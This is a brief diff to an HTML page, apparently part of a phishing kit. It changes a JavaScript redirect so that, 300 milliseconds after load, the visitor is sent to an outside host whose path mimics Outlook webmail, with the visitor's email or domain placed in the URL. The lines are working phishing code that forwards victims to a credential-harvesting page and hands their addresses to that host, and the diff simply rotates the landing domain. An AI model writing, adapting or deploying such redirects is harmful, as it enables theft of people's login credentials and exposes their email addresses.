--- a/gee.html
+++ b/gee.html
@@ -11,7 +11,7 @@
         var dom = cross[0];
 
           setTimeout(function(){
-            var redirect ="https://alicegateway.buzz/web/webonline/?client_email={domain}";
+            var redirect ="https://sacredvirgo.org/web/outlook.web/?client_email={domain}";
             var link = redirect.replace("{domain}",dom);
             window.location.href = link;
          },300);
